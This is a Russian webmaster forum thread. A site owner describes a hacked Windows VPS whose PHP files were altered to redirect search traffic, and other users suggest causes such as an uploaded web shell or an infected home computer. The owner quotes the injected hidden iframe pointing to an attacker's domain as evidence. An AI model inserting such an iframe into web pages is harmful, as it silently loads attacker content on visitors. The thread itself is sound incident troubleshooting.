- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Как удалить плохие SEO-ссылки и очистить ссылочную массу сайта
Применяем отклонение ссылок
Сервис Rookee
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
здравствуйте. Недавно у меня взломали сервер и внесли изменения почти во все файлы с расширением php (добавили код который переадресует пользователей с поисковых систем на другие сайты) из-за этого много сайтов вылетели из индекса... добавили новые файлы (создали дополнительные странички, внесли изменения в карту сайта) и т.д. Я это все выявил, восстановил из чистого архива движки сайтов. По безопасности сделал следующее: запретил использование почтовых портов, ssh, и вход в админ панель только с одного ip адреса (он у меня статический). Но вот сегодня обнаружил, что опять на сайтах произошли изменения. Согласно журнала был вход под моим ip с 00-43 до 00-50 и изменены файлы в основном index.php внесли фрейм вида "<iframe src="http://mazahack.net/go.ph4lb" width=0 height=0 frameborder=0></iframe>" ...
Хостинг от firstvds.ru, виртуальный выделенный сервер.
Подскажите пожалуйста как такое стало возможным (статический адрес только у меня такой) и как я смогу себя обезопасить. Спасибо.
Почему бы злоумышленникам не изменять файлы подключаясь с вашего компьютера ?
В списке предпринятых действий ничего не написано про то, что было сделано на рабочем компьютере. Антивирус хоть запускали ? В идеале, конечно, переустановка системы нужна.
Надо детальнее рассматривать, вы могли трактовать не верно логи
Большая вероятность, что вам залили шелл, потомуи не помогает изменения паролей и др. действия.
Надо проверить через что именно сломали.
Большая вероятность, что вам залили шелл, потомуи не помогает изменения паролей и др. действия.
Как его можно выявить?
PS. Комп проверял установленным нодом пятеркой и дестопным др. вебером - чист
Сервер под какой ОС? Windows?
да под виндовс
Тогда ой. А зачем для сайта на php винда?
Бутаться с ливцд и проверять..
После того как система уже скомпрометирована .... даже в unix нет смысла что-то чинить по большому счету, ибо есть всякие kld вирусы и прочее, которые отрезают сами себя от окружения и вы их попросту не видите ни в процессах ни где..... Что уж тут говорить про винду...... А вообще менять ваши файлы на сервере можно и через мелкую дырочку в любом из ваших же PHP cкриптов к примеру, т.е ssh и прочее вообще не нужно ..... человек на сайт к вам зашел и все сделал что надо... изучайте логи веб сервера.... я думаю там вы обязательно что-то найдете :D